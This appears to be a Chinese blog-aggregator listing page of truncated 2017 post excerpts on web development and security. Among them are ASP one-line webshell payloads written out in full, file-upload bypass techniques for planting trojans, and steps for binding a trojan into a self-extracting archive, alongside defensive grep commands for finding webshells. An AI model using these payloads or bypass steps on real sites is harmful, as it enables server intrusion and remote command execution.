、实际应用-图片的旋转木马效果 您可以狠狠地点击这里:图片的旋转木马效果demo 建议在足够新版本的FireFox浏览器或Safari浏览器下观看,Chrome可能需要居中定位查看,下图为效果缩略图: 原理: 那些看上去很酷酷的CSS3 3D效果其实就颠来倒去那几个属性(本文提到的这几个),折腾来折 ...
分类:
Web程序 时间:
2017-03-16 18:57:02
阅读次数:
265
1.站点根目录下查找是否被放置webshell木马根据语句判断是不是PHP木马脚本#find/storage/www/-name"*.php"|xargsgrep-in--color"eval("#grep-i--include=‘*.php‘-rsystem\s*\(/storage/www/2.统计访问日志中来自同ip出现的次数分析盗链、攻击、机器人#cataccess.log|awk‘{print..
分类:
Web程序 时间:
2017-03-13 22:26:53
阅读次数:
244
纯碎手痒,写一个jsp木马。代码如下: 截图: ...
分类:
Web程序 时间:
2017-03-13 13:22:35
阅读次数:
1482
大家的windows机器可能经常装一些杀毒软件或者什么的来防止中毒,然而在Linux上我们应该怎么防止这些呢? 在面试过程中我们也经常遇到该类问题,那么我们应该怎么回答才显得既有逻辑又有深度呢? 首先明确我们收到攻击的方式,以及通过什么渠道攻击我们的Linux服务器: 因为Linux下的木马常常是恶 ...
分类:
系统相关 时间:
2017-03-08 01:01:41
阅读次数:
203
前言 众所周知,传统的恶意程序都是由单一文件构成的,从而实现某一种或者几种恶意功能。而这类的恶意程序为了避免被发现以及被查杀,往往会采用五花八门的自我隐藏技术以及免杀技术,病毒程序的作者很...
分类:
其他好文 时间:
2017-02-26 00:13:30
阅读次数:
212
1.Thinkphp图像处理 在TP框架中,我们经常用到图片上传,我最近写了很多关于图片上传的文章,thinkphp图片上传+validate表单验证+图片木马检测+缩略图生成等文章,今天写一下关于图片上传成功后给图片加水印文字或者加图片水印, 1.1图片处理类和库 首先,在Thinkphp\Thi ...
分类:
Web程序 时间:
2017-02-21 00:41:38
阅读次数:
237
MIME类型绕过: 上传木马时,提示格式错误。直接抓包修改Content-Type 为正确的格式尝试绕过 文件扩展名绕过: Php除了可以解析php后缀 还可以解析php2.php3,php4 后缀 文件内容检测绕过: 抓包,在正常图片末尾添加一句话木马 00截断绕过上传 1.php .jpg 空格 ...
分类:
Web程序 时间:
2017-02-19 23:49:50
阅读次数:
253
一次真实的比特币敲诈木马经历2017年2月18日,经历了一次“spora比特币敲诈”木马。之前见过一个人中过这种病毒,是CTB-locker,但是由于当时人家电脑里说没有重要文件,就给他将磁盘格了,重新分区装系统。据说,当时他是收到了一个邮件,点击了里面的附件,才中了木马的。这..
分类:
其他好文 时间:
2017-02-19 18:59:39
阅读次数:
737
rar自解压绑马 (1)先用winrar压缩加密文件。压缩后的文件可改为任意后缀名,如.jpg (2)然后将unrar和加密压缩的文件打包成自解压文件。在"提取后运行"里填上"unrar e -p111111 calc.jpg" 然后回车再输入解压后的exe文件名,如calc.exe. (3)打包后 ...
分类:
其他好文 时间:
2017-01-22 10:38:16
阅读次数:
232
1.一句话说明 常用的一句话有冰狐浪子的一句话,蓝屏的,lack2的,当然还有海洋的。我们如果知道了一句话的原理。自己也可以很轻松的写一个。 <%execute(request("cmd"))%> <%execute request("1")%> ASP一句话16进制:┼攠數畣整爠煥敵瑳∨≡┩愾 密 ...
分类:
其他好文 时间:
2017-01-21 10:48:59
阅读次数:
285
